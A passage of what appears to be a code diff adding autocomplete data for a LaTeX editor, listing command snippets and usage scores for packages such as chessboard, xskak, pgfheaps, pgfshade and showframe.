0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chessboard-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'chessboard-cmd', + score: 
0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'chessboard-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chessboard-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'chessboard-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chessboard-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chessboard-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chessboard-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'chessboard-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chessboard-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'chessboard-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'chessboard-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\green', + snippet: '\\green', + meta: 'chessboard-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'chessboard-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'chessboard-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'chessboard-cmd', + score: 
1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'chessboard-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'chessboard-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'chessboard-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'chessboard-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'chessboard-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'chessboard-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'chessboard-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chessboard-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chessboard-cmd', + score: 0.008565354665444157, + }, + ], + xskak: [ + { + caption: '\\mainline{}', + snippet: '\\mainline{$1}', + meta: 'xskak-cmd', + score: 0.0010267678375242572, + }, + { + caption: '\\newchessgame', + snippet: '\\newchessgame', + meta: 'xskak-cmd', + score: 0.000880086717877935, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'xskak-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'xskak-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'xskak-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboardfontencoding{}', + snippet: '\\setboardfontencoding{$1}', + meta: 'xskak-cmd', + score: 0.00014668111964632249, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'xskak-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'xskak-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'xskak-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'xskak-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xskak-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: 
'\\DeclareGraphicsExtensions{$1}', + meta: 'xskak-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xskak-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'xskak-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'xskak-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'xskak-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'xskak-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'xskak-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'xskak-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xskak-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'xskak-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'xskak-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xskak-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'xskak-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xskak-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xskak-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'xskak-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'xskak-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'xskak-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xskak-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'xskak-cmd', + score: 0.0030745841706804776, + }, + { + caption: 
'\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'xskak-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'xskak-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'xskak-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'xskak-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'xskak-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'xskak-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'xskak-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'xskak-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xskak-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xskak-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'xskak-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'xskak-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'xskak-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'xskak-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'xskak-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'xskak-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'xskak-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'xskak-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'xskak-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'xskak-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'xskak-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'xskak-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 
'xskak-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xskak-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'xskak-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'xskak-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'xskak-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'xskak-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xskak-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\green', + snippet: '\\green', + meta: 'xskak-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'xskak-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'xskak-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'xskak-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'xskak-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'xskak-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'xskak-cmd', + score: 0.006520475264573554, + }, + ], + pgfheaps: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfheaps-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfheaps-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfheaps-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfheaps-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfheaps-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfheaps-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfheaps-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfheaps-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfheaps-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + 
snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfheaps-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfheaps-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfheaps-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfheaps-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfheaps-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfheaps-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfheaps-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfheaps-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfheaps-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfheaps-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfheaps-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfheaps-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfheaps-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfheaps-cmd', + score: 0.2864294797053033, + }, + ], + pgfshade: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfshade-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfshade-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfshade-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfshade-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: 
'\\includegraphics[$1]{$2}', + meta: 'pgfshade-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfshade-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfshade-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfshade-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfshade-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfshade-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfshade-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfshade-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfshade-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfshade-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfshade-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfshade-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfshade-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfshade-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfshade-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfshade-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfshade-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfshade-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + 
snippet: '\\color{$1}', + meta: 'pgfshade-cmd', + score: 0.2864294797053033, + }, + ], + showframe: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'showframe-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'showframe-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'showframe-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'showframe-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'showframe-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'showframe-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'showframe-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\AddToShipoutPictureFG{}', + snippet: '\\AddToShipoutPictureFG{$1}', + meta: 'showframe-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\AddToShipoutPictureBG{}', + snippet: '\\AddToShipoutPictureBG{$1}', + meta: 'showframe-cmd', + score: 0.0008957666085644653, + }, + { + caption: '\\AtPageUpperLeft{}', + snippet: '\\AtPageUpperLeft{$1}', + meta: 'showframe-cmd', + score: 0.0003608141410278152, + }, + { + caption: '\\LenToUnit{}', + snippet: '\\LenToUnit{$1}', + meta: 'showframe-cmd', + score: 0.0007216282820556304, + }, + { + caption: '\\AddToShipoutPicture{}', + snippet: '\\AddToShipoutPicture{$1}', + meta: 'showframe-cmd', + score: 0.0017658629469099734, + }, + ], + psvectorian: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'psvectorian-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'psvectorian-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'psvectorian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'psvectorian-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'psvectorian-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 